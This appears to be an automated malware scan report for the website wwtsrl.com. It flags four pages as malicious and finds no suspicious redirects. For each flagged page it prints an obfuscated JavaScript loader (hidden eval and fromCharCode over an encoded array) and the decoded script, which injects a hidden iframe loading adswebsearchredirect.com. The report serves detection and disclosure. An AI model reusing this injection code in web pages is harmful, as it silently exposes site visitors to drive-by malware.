Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wwtsrl.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wwtsrl.com/ | 200 OK Content-Length: 6573 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=(Number+'4732').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'v'+'a'+'l'];f='fr';f=f+'omCha'.concat('rC','o','d','e');}();t='q';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5q4.5q52.5q51q16q20q50q55.5q49.5q58.5q54.5q50.5q55q58q23q51.5q50.5q58q34.5q54q50.5q54.5q50.5q55q58q57.5q33q60.5q42q48.5q51.5q39q48.5q54.5q50.5q20q19.5q49q55.5q50q60.5q19.5q20.5q45.5q24q46.5q20.5q61.5q4.5q4.5q4.5q52.5q51q57q48.5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://adswebsearchredirect.com/ads/stat.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute( <iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://wwtsrl.com/index.html | 200 OK Content-Length: 6573 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=(Number+'4732').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'v'+'a'+'l'];f='fr';f=f+'omCha'.concat('rC','o','d','e');}();t='q';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5q4.5q52.5q51q16q20q50q55.5q49.5q58.5q54.5q50.5q55q58q23q51.5q50.5q58q34.5q54q50.5q54.5q50.5q55q58q57.5q33q60.5q42q48.5q51.5q39q48.5q54.5q50.5q20q19.5q49q55.5q50q60.5q19.5q20.5q45.5q24q46.5q20.5q61.5q4.5q4.5q4.5q52.5q51q57q48.5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://adswebsearchredirect.com/ads/stat.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute( <iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://wwtsrl.com/servicios.html | 200 OK Content-Length: 5008 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=(Number+'4732').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'v'+'a'+'l'];f='fr';f=f+'omCha'.concat('rC','o','d','e');}();t='q';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5q4.5q52.5q51q16q20q50q55.5q49.5q58.5q54.5q50.5q55q58q23q51.5q50.5q58q34.5q54q50.5q54.5q50.5q55q58q57.5q33q60.5q42q48.5q51.5q39q48.5q54.5q50.5q20q19.5q49q55.5q50q60.5q19.5q20.5q45.5q24q46.5q20.5q61.5q4.5q4.5q4.5q52.5q51q57q48.5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://adswebsearchredirect.com/ads/stat.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute( <iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://wwtsrl.com/contacto.html | 200 OK Content-Length: 8269 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(window.document)aa=(Number+'4732').substr(0,4);aaa=(Date+{}).substr(0,4);if(aa===aaa){ss=new String();s=String;12-function(){e=window['e'+'v'+'a'+'l'];f='fr';f=f+'omCha'.concat('rC','o','d','e');}();t='q';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5q4.5q52.5q51q16q20q50q55.5q49.5q58.5q54.5q50.5q55q58q23q51.5q50.5q58q34.5q54q50.5q54.5q50.5q55q58q57.5q33q60.5q42q48.5q51.5q39q48.5q54.5q50.5q20q19.5q49q55.5q50q60.5q19.5q20.5q45.5q24q46.5q20.5q61.5q4.5q4.5q4.5q52.5q51q57q48.5 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://adswebsearchredirect.com/ads/stat.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute( <iframe src='http://adswebsearchredirect.com/ads/stat.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://wwtsrl.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wwtsrl.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 20:03:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6573
Content-Type: text/html
Last-Modified: Tue, 24 Jan 2012 03:25:43 GMT
...6573 bytes of data.
GET / HTTP/1.1
Host: wwtsrl.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 20:03:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6573
Content-Type: text/html
Last-Modified: Tue, 24 Jan 2012 03:25:43 GMT
...6573 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wwtsrl.com
Referer: http://www.google.com/search?q=wwtsrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wwtsrl.com
Referer: http://www.google.com/search?q=wwtsrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.